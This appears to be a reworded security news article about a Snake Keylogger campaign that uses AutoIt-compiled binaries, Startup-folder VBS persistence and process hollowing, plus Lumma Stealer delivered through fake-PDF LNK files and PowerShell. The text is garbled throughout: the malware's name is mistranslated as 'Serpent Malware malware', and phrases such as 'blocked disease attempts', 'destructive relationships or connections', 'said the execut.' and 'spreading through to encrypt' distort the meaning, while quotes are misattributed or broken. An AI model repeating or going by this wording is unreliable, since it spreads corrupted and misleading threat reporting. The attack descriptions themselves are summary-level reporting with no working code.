A new version of the Serpent Malware malware is being used to constantly objective Windows customers located in China, Turkey, Indonesia, Taiwan, and Spain.
Over 280 million blocked disease attempts have been made global since the start of the year, according to Fortinet FortiGuard Labs, according to FortiGuard Labs.
” Usually delivered through phishing emails containing destructive relationships or connections, Snake Keylogger is designed to steal sensitive information from popular web sites like Chrome, Edge, and Firefox by logging keystrokes, capturing credentials, and monitoring the clipboard”, security researcher Kevin Su .
With the help of the Simple Mail Transfer Protocol ( SMTP ) and Telegram bots, it’s other features allow it to exfiltrate the stolen data to an attacker-controlled server, allowing the threat actors to gain access to stolen credentials and other sensitive data.
The most notable aspect of the most recent set of attacks is that it uses AutoIt scripting to deliver and execute the main payload. In other words, the executable containing the malware is an AutoIt-compiled binary, thereby allowing it to bypass traditional detection mechanisms.
The use of AutoIt makes dynamic behavior that mimics benign automation tools possible as well as complicate static analysis by embedding the payload within the compiled script, Su added.
Once launched, Snake Keylogger is designed to drop a copy of itself to a file named” ageless. exe “in the folder” % Local_AppData % supergroup. ” It also proceeds to drop another file called” ageless. vbs “in the Windows Startup folder such that every time the system reboots, Visual Basic Script (VBS ) automatically launches the malware.
Snake Keylogger is able to continue its malicious activities even after the associated process is terminated by using this persistence mechanism.
The attack chain culminates with the injection of the main payload into a legitimate .NET process such as” regsvcs. “using a method called process hollowing, allowing the malware to hide its location within a trusted process and avoid detection,” said the execut.
Additionally, keyloggers that use websites like checkip have been discovered. dyndns [. ] org to retrieve the victim’s IP address and geolocation.
” To capture keystrokes, it leverages the SetWindowsHookEx API with the first parameter set to WH_KEYBOARD_LL ( flag 13 ), a low-level keyboard hook that monitors keystrokes,” Su said”. This method enables the malware to log sensitive data, such as banking credentials.
The development comes as CloudSEK exposed a campaign that is distributing malicious LNK files disguised as PDF documents in order to eventually use the malware by exploiting compromised infrastructure associated with educational institutions.
The activity, targeting industries like finance, healthcare, technology, and media, is a multi-stage attack sequence that results in the theft of passwords, browser data, and cryptocurrency wallets.
Security researcher Mayank Sahariya that the campaign’s primary infection vector is the use of malicious LNK ( shortcut ) files that are designed to appear as legitimate PDF documents. The files are hosted on a WebDAV server, which unsuspecting visitors are redirected to after visiting websites, according to security researcher Mayank Sahariya.
For its part, the LNK file runs a PowerShell command to connect to a distant server and retrieve the next-stage malware, an obfuscated JavaScript code that contains another PowerShell that downloads Lumma Stealer from the same server and executes it.
In recent weeks, stealer malware has been discovered spreading through to encrypt a variety of sensitive data from compromised Windows systems and entrust it to a Telegram bot run by the attacker.
The attack begins with an obfuscated JavaScript file that retrieves encoded strings from an open-source service to execute a PowerShell script, according to Cyfirma.
The script then downloads a JPG image and a text file from an IP address and a URL shortener, both of which contain malicious MZ DOS executables embedded using steganographic techniques. Once executed, these payloads deploy stealer malware.”